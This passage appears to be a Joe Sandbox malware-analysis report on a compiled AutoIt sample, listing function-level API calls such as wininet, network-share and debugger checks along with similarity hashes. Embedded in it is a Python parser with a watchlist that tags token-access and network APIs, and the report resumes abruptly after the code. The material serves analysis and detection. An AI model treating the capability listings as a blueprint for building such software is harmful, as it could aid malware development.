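• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB0F6
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• Opcode ID: 35352e561c454a3e9cf46976b3b09cf76253efa4e475b0acb4ebcd31ca5244b2
APIs
• _memset.LIBCMT ref: 008F259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F25D4
Similarity
• API ID: CrackInternet_memset
• String ID: |
• Opcode ID: 7cdac23ba206c319908b5f545af0e0e243e30583b7cf790d0e74bb4d0dfcbb77
"""

# One API line: optional 'Part of subcall function ADDR: ' prefix, then
# Name.MODULE, optional '(args)', then ' ref: ADDR' (a comma precedes ' ref'
# only when an argument list is present).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id",
          "Opcode ID": "opcode_id", "Instruction Fuzzy Hash": "fuzzy_hash"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                    # call-site address inside the dump
    subcall_of: Optional[str]   # callee address for 'Part of subcall' lines

@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    fuzzy_hash: str = ""
    apis: list = field(default_factory=list)

    def direct_api_names(self):
        """APIs called by this function itself, excluding subcall entries."""
        return [a.name for a in self.apis if a.subcall_of is None]

def parse_records(text):
    """Split the flattened report text into FunctionRecords, one per 'APIs' header."""
    records = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        line = line.removesuffix("Download File")  # link residue on 'Associated' lines
        if line == "APIs":
            records.append(FunctionRecord())
            continue
        if not records:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            records[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] in FIELDS:
            setattr(records[-1], FIELDS[m["key"]], m["val"].strip())
    return records

# Illustrative watchlist (author's assumption, not from the report): API names
# whose presence in a single function is worth a closer look.
WATCHLIST = {
    "token-access": {"OpenProcessToken", "OpenThreadToken"},
    "url-parse": {"InternetCrackUrlW"},
    "network-share": {"WNetUseConnectionW"},
}

def tag_records(records):
    """Map Opcode ID -> sorted watchlist tags hit by that function's direct calls."""
    tags = {}
    for rec in records:
        names = set(rec.direct_api_names())
        hit = sorted(tag for tag, apis in WATCHLIST.items() if names & apis)
        if hit:
            tags[rec.opcode_id] = hit
    return tags

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.opcode_id[:12], rec.api_id, "->", ", ".join(rec.direct_api_names()))
    print(tag_records(recs))
```

Keying the result on the Opcode ID rather than the call-site address is deliberate: the address is only meaningful within this one dump, while the Opcode ID and fuzzy hash are what the plugin uses for similarity across samples. Note that the report flags this binary as a compiled AutoIt script (the "AutoIt3GUI" string above), so hits here locate capabilities inside the AutoIt runtime; whether the embedded script actually invokes them has to be confirmed from the extracted script itself.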
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00907B61
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00907B76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: b3583ded150fa11cc58d85b627098559009fdddbd887077c4dc0061d54af33dd
                                    • Instruction ID: cd6eec688ca5ee169135aa1ea326ce966192faf083ea7ae108792cc762857770
                                    • Opcode Fuzzy Hash: b3583ded150fa11cc58d85b627098559009fdddbd887077c4dc0061d54af33dd
                                    • Instruction Fuzzy Hash: EC410774E052099FDB14CFA4C881BEABBB9FF09310F10416AE905EB391D770A951DFA0
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00906B17
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00906B53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: c678f641b0c6082737adb3e2a5b35f413f5054f19f96541ff48a584a156a02b1
                                    • Instruction ID: 71f89cba740051826fd2df05ae00a077d8de5d0fbe5b67ab576da01e2b73cf8c
                                    • Opcode Fuzzy Hash: c678f641b0c6082737adb3e2a5b35f413f5054f19f96541ff48a584a156a02b1
                                    • Instruction Fuzzy Hash: D9318F71210604AEDB109F68CC91BFB77ADFF48764F108629F9A5D7190DB31AC91D760
                                    APIs
                                    • _memset.LIBCMT ref: 008E2911
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E294C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 34c25b1b7abf37afd461197d9cb6c6485825f570469348b50b5f85ee7524cebd
                                    • Instruction ID: 645a248ca8e013a9f1de8ceaefbfc19e924d673097f6a995e7361d5f476c5fd8
                                    • Opcode Fuzzy Hash: 34c25b1b7abf37afd461197d9cb6c6485825f570469348b50b5f85ee7524cebd
                                    • Instruction Fuzzy Hash: 1D31D1716003899BEB24EF5ACC45FAEBFACFF07350F141069E985E61A2DB709940CB11
                                    APIs
                                    • __snwprintf.LIBCMT ref: 008F3A66
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __snwprintf_memmove
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 3506404897-2584243854
                                    • Opcode ID: bb2ddbc90d722b3aa08156e945ec65d41f506de6fd4ce7fd646b3f102520ff50
                                    • Instruction ID: b26d05fa72146b720562abf6813cb90104e56789c12f1be022d4ab49cff3e3b2
                                    • Opcode Fuzzy Hash: bb2ddbc90d722b3aa08156e945ec65d41f506de6fd4ce7fd646b3f102520ff50
                                    • Instruction Fuzzy Hash: AA215E7160062DAECF10EFA9CC82AAEBBB5FF44704F500455F545E7182DA30EA45CB62
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00906761
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0090676C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 514fab7f9da8b14f5e77d7b1a68c1789766de68611824613bcefe7630c214c58
                                    • Instruction ID: 6eb3cfaf8150c69e589ec29d2b564b01fe55af1a968320b7e870be34ae4b58af
                                    • Opcode Fuzzy Hash: 514fab7f9da8b14f5e77d7b1a68c1789766de68611824613bcefe7630c214c58
                                    • Instruction Fuzzy Hash: 69118675210209AFEF119F54CC81EAB37AEEB84368F114125F914972D1D775DC6197A0
                                    APIs
                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • GetWindowRect.USER32(00000000,?), ref: 00906C71
                                    • GetSysColor.USER32(00000012), ref: 00906C8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 009069A2
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009069B1
                                    Strings
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    APIs
                                    • _memset.LIBCMT ref: 008E2A22
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2A41
                                    Strings
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F222C
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2255
                                    Strings
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D8E73
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D8D6B
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D8DEE
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    APIs
                                      • Part of subcall function 008BB314: _memset.LIBCMT ref: 008BB321
                                      • Part of subcall function 008A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(00944158,00000000,00944144,008BB2F0,?,?,?,0088100A), ref: 008A0945
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB2F4
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB303
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB2FE
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3158253471-631824599
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 008C1775
                                      • Part of subcall function 008FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,008C195E,?), ref: 008FBFFE
                                      • Part of subcall function 008FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008FC010
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008C196D
                                    Strings
                                    Similarity
                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                    • String ID: WIN_XPe
                                    • API String ID: 582185067-3257408948
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009059AE
                                    • PostMessageW.USER32(00000000), ref: 009059B5
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Strings
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0090596E
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00905981
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Strings
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461